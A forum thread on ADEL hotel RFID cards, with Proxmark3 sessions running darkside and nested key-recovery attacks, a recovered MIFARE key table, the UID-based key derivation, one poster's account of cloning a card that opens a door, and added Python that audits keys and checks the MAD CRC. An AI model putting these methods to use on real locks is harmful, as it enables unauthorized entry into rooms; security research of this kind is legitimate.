Research, development and trades concerning the powerful Proxmark3 device.
The Adel card is a clone which always NACKs, making darkside take a bit longer. Not needed since it's a default key, which would be picked up with checkkeys.
Uses a very strange SAK, 0x19
Many default keys, the sector 1, 15 AB == 127567df7ba4 --> 12 UID A4
pm3 --> hf 14a info
UID : 75 67 DF 7B
ATQA : 00 04
SAK : 19 [2]
proprietary non iso14443-4 card found, RATS not supported
Answers to magic commands: NO
Prng detection: WEAK
pm3 --> hf mf nack
.
Always leak NACK detected
pm3 --> hf mf mif
----------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average
Press pm3-button on the proxmark3 device to abort both proxmark3 and client.
----------------------------------------------------------------------------
.
Parity is all zero. Most likely this card sends NACK on every authentication.
Attack will take a few seconds longer because we need two consecutive successful runs.
.....
Found 72 candidate keys. Trying to verify with authentication...
Test authentication failed. Restarting darkside attack
.
Parity is all zero. Most likely this card sends NACK on every authentication.
Attack will take a few seconds longer because we need two consecutive successful runs.
..
Found 13 candidate keys. Trying to verify with authentication...
Test authentication failed. Restarting darkside attack
.
Parity is all zero. Most likely this card sends NACK on every authentication.
Attack will take a few seconds longer because we need two consecutive successful runs.
..
Found a candidate key. Trying to verify it with authentication...
Found valid key: a0a1a2a3a4a5
pm3 --> hf mf nested 1 0 a a0a1a2a3a4a5
Testing known keys. Sector count=16
Time to check 18 known keys: 7 seconds
enter nested...
UID: 7567df7b target block: 0 key type: B -- Found key [d0d1d2d3d4d5]
UID: 7567df7b target block: 4 key type: A -- Found key [127567df7ba4]
UID: 7567df7b target block: 4 key type: B
UID: 7567df7b target block: 60 key type: A -- Found key [127567df7ba4]
UID: 7567df7b target block: 60 key type: B -- Found key [127567df7ba4]
UID: 7567df7b target block: 4 key type: B -- Found key [127567df7ba4]
Time in nested: 12 seconds
trying to read key B...
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| a0a1a2a3a4a5 | 1 | d0d1d2d3d4d5 | 1 |
|001| 127567df7ba4 | 1 | 127567df7ba4 | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| ffffffffffff | 1 | ffffffffffff | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ffffffffffff | 1 | ffffffffffff | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| 127567df7ba4 | 1 | 127567df7ba4 | 1 |
|---|----------------|---|----------------|---|
simple keygen algo:
key[0] = uid[0] ^ uid[1]
key[1-4] = uid[0-3]
key[5] = checksum ( key[0]^key[1]^key[2]^key[3]^key[4] )
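An added example, not code from the thread's posters or the Proxmark3 project: the keygen construction above written out in Python and used to audit a recovered key table, labelling each sector key as a default, derived from the UID, or neither. The function names, the `DEFAULT_KEYS` set and the three labels are assumptions made for this illustration; the table rows are copied from the first post.

```python
# Added example: audit MIFARE Classic sector keys for defaults and UID-derived keys.
# a0a1a2a3a4a5 is called a default key in the thread; ffffffffffff is the factory default.
DEFAULT_KEYS = {"ffffffffffff", "a0a1a2a3a4a5"}

def uid_derived_key(uid: bytes) -> bytes:
    """Key construction posted in the thread, for a 4-byte UID."""
    if len(uid) != 4:
        raise ValueError("the posted construction covers 4-byte UIDs only")
    body = bytes([uid[0] ^ uid[1]]) + uid      # key[0], then key[1-4] = uid[0-3]
    checksum = 0
    for b in body:                             # key[5] = XOR of key[0..4]
        checksum ^= b
    return body + bytes([checksum])

def parse_key_table(text: str):
    """Yield (sector, key_a, key_b) from rows of the pm3 key table."""
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) == 5 and cells[0].isdigit():
            yield int(cells[0]), cells[1].lower(), cells[3].lower()

def audit(uid_hex: str, table_text: str) -> dict:
    """Map (sector, 'A'|'B') to 'default', 'uid-derived' or 'other'."""
    derived = uid_derived_key(bytes.fromhex(uid_hex)).hex()
    findings = {}
    for sector, key_a, key_b in parse_key_table(table_text):
        for slot, key in (("A", key_a), ("B", key_b)):
            if key in DEFAULT_KEYS:
                findings[(sector, slot)] = "default"
            elif key == derived:
                findings[(sector, slot)] = "uid-derived"
            else:
                findings[(sector, slot)] = "other"
    return findings

# Rows copied from the key table in the first post (header and separator included).
SAMPLE_TABLE = """\
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| a0a1a2a3a4a5 | 1 | d0d1d2d3d4d5 | 1 |
|001| 127567df7ba4 | 1 | 127567df7ba4 | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|015| 127567df7ba4 | 1 | 127567df7ba4 | 1 |
"""

if __name__ == "__main__":
    for (sector, slot), kind in sorted(audit("7567df7b", SAMPLE_TABLE).items()):
        print(f"sector {sector:2d} key {slot}: {kind}")
```

Because the derived key depends only on the UID, which the card returns to any reader during anticollision, a key flagged `uid-derived` protects its sector no better than a published default.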
Hey Iceman did these have sector 16 - 31 locked down as well? Think I have a couple samples from the same system as you, the XOR algo on mine matches yours. I have one sample that's been coded in the system with a biometrics application and one that should be straight out of the box from the supplier without additional coding from the hotel's desktop encoder. Both have S16 - 31 A/B locked and I don't think those sectors follow the S1/15 keys you cracked.
SAK 0x19 seemed strange to me as well (it's how I stumbled on this thread) - assumed this chip was Mifare Plus 2k 4 byte UID in SL1 but I expected SAK to be 0x18 then.
Dunno if s16-31 matches. I didn't have access to a 4k card from Adel. Collect and gather enough samples so you can get some analysing done.
I successfully cloned an ADEL card to a UID (Chinese magic gen1, 1k) card.
The ADEL card just used a strange SAK=19 to confuse regular hobbyists. It is just a regular M1 S50 1k with the SAK altered. There are no locked sectors 16 - 31. And it doesn't require anything but sectors 1 and 15 to open the door, like most door access systems do. (at least in my version)
To clone it, I managed to source a "perfect" UID card that loyally reads the SAK byte in block 0 and responds to the reader with that SAK.
This card is quite rare since most UID/magic cards just respond with SAK 08, for simplicity I guess? Just found 4 out of 60 cards....
(was 4 out of 33, and I thought as my vendor search expanded there would be more "perfect" cards emerging, but it didn't turn out that way.)
Last edited by hfmfsniff (2019-07-19 21:06:36)
sector 0: blk1: 0000 6c51 0000 0000 0000 0000 0000 00aa blk2: 0000 0000 0000 0000 0000 0000 0000 6851 ....
Sector 0 of ADEL card is usually filled with (often with consecutive repetition) 6C51, 6B51, 6851, 6A51. Does that make any sense to you?
Here is my sample.
blk1: 0007 6C51 0000 0000 0000 0000 0000 0600
blk2: 6B51 6B51 6B51 6B51 6B51 6B51 6851 6A51
This pattern is highly conserved across 3 cards that open the same door. What is funny is that only the last "6A51" in blk2 is useful. It can be modified to the following and still open the door:
blk1: 0007 6C51 0000 0000 0000 0000 0000 0600
blk2: 0000 0000 0000 0000 0000 0000 0000 6A51
This pattern aligns with your pattern very well.
Last edited by hfmfsniff (2019-07-19 21:20:12)
Sector 0 blocks 1 and 2 most often contain the Mifare Application Directory (MAD). It shows which sectors are used by which application. You can look up the application IDs on http://cardinfo.barkweb.com.au/index.ph … =19&sub=36. The MAD checksum will become invalid if you modify parts of it.
Very useful information. However, I think ADEL doesn't check CRC bits validity (block1, second byte) at all. The cards still open the door after modification of AIDs.
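The MAD layout and checksum discussed above, as an added example that is not part of the original posts: it splits sector 0 blocks 1 and 2 into the per-sector AID entries and recomputes the MAD version 1 CRC-8 (polynomial 0x1D, preset 0xC7, over bytes 1 to 31) for comparison with the stored byte 0. The function names are assumptions made for this illustration; the block values are the sector 0 values quoted earlier in the thread.

```python
# Added example: decode a MAD version 1 directory and check its CRC byte.

def mad_crc8(data: bytes) -> int:
    """CRC-8 used by MAD: polynomial 0x1D, preset 0xC7, MSB first."""
    crc = 0xC7
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1D) & 0xFF if crc & 0x80 else (crc << 1) & 0xFF
    return crc

def parse_mad1(block1: bytes, block2: bytes) -> dict:
    """Split sector 0 blocks 1 and 2 into the MAD v1 fields."""
    if len(block1) != 16 or len(block2) != 16:
        raise ValueError("blocks 1 and 2 must be 16 bytes each")
    mad = block1 + block2
    # Byte 0 is the CRC, byte 1 the info byte, then one 2-byte AID per sector 1..15.
    aids = {s: mad[2 * s:2 * s + 2].hex() for s in range(1, 16)}
    computed = mad_crc8(mad[1:])
    return {
        "stored_crc": mad[0],
        "computed_crc": computed,
        "crc_ok": mad[0] == computed,
        "info": mad[1],
        "aids": aids,                      # AID bytes as stored on the card
        "used_sectors": [s for s, aid in aids.items() if aid != "0000"],
    }

# Sector 0 values quoted in the thread.
BLOCK1 = bytes.fromhex("0000 6c51 0000 0000 0000 0000 0000 00aa")
BLOCK2 = bytes.fromhex("0000 0000 0000 0000 0000 0000 0000 6851")

if __name__ == "__main__":
    mad = parse_mad1(BLOCK1, BLOCK2)
    print("used sectors:", mad["used_sectors"])
    print("stored CRC %02x, computed %02x, ok=%s"
          % (mad["stored_crc"], mad["computed_crc"], mad["crc_ok"]))
```

A reader that accepts a card whose stored and computed CRC differ is not validating the directory, so the MAD gives no integrity protection on such a system.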